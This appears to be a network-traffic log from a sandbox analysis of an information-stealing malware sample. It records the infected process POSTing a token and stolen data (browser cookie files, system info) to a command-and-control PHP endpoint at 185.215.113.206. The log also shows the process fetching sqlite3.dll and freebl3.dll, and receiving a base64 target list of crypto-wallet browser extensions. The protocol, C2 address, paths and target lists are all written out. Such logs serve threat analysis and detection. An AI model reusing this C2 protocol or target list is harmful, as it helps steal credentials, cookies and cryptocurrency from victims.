TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 23, 2024 07:09:16.437480927 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 23, 2024 07:09:16.437508106 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 23, 2024 07:09:16.437524080 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 23, 2024 07:09:16.437545061 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 23, 2024 07:09:16.437562943 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 23, 2024 07:09:16.439292908 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 2d 2d 0d 0a Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="message"fplugins------FBKJKEHIJECGCBFIJEGI--
Nov 23, 2024 07:09:16.878060102 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 23, 2024 07:09:16.895267963 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 185.215.113.206 Content-Length: 5975 Connection: Keep-Alive Cache-Control: no-cache
Nov 23, 2024 07:09:16.895348072 CET	5975	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 23, 2024 07:09:17.966134071 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:18.334115028 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:18.771039963 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 23, 2024 07:09:18.771059990 CET	124	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 23, 2024 07:09:18.773344994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:09:18.773441076 CET	1236	IN	Data Raw: 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 ea fc ff ff 83 ec 0c eb 8a 90 8d 74 26 00 83 fb 01 75 70 e8 c6 e4 0a 00 89 7c 24 08 c7 44 24 04 01 00 00 00 89 34 Data Ascii: $\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49778	185.215.113.206	80	2128	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:09:28.020371914 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IJDHDGDAAAAKFIDGHJDG--
Nov 23, 2024 07:09:29.919527054 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:30.107461929 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBG Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file"------FHCGHJDBFIIDGDHIJDBG--
Nov 23, 2024 07:09:31.061441898 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49817	185.215.113.206	80	2128	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:09:36.873600960 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHI Host: 185.215.113.206 Content-Length: 3083 Connection: Keep-Alive Cache-Control: no-cache
Nov 23, 2024 07:09:36.873641968 CET	3083	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 23, 2024 07:09:38.782608032 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:39.255881071 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Nov 23, 2024 07:09:40.193568945 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:40.779731035 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:41.226771116 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 23, 2024 07:09:41.226881027 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO
Nov 23, 2024 07:09:41.226892948 CET	1236	IN	Data Raw: 01 00 00 e8 3f 0b 08 00 83 c4 04 85 c0 74 30 89 c7 89 80 38 01 00 00 83 c7 0f 31 f6 83 e7 f0 74 6b 8b 45 14 8b 55 10 8b 5d 0c 8b 4d 08 85 db 74 1f f2 0f 10 03 f2 0f 11 87 30 01 00 00 eb 25 68 13 e0 ff ff e8 f2 0a 08 00 83 c4 04 31 f6 eb 3c c7 87 Data Ascii: ?t081tkEU]Mt0%h1<40jRjjPQWt8^_[]UWVut }jVt8h^_]USWVPL$,M01D$HD$4r
Nov 23, 2024 07:09:41.226903915 CET	1236	IN	Data Raw: 24 1c 00 00 00 00 89 44 24 08 c7 44 24 24 00 00 00 00 c7 44 24 20 00 00 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 Data Ascii: $D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(
Nov 23, 2024 07:09:41.226914883 CET	148	IN	Data Raw: c1 09 ca c1 fa 1f f7 db 83 e3 07 31 ff 39 d9 f7 d2 0f 44 fa 89 45 d0 89 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 Data Ascii: 19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7!
Nov 23, 2024 07:09:41.227030993 CET	1236	IN	Data Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 Data Ascii: !)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
Nov 23, 2024 07:09:41.227118969 CET	1236	IN	Data Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
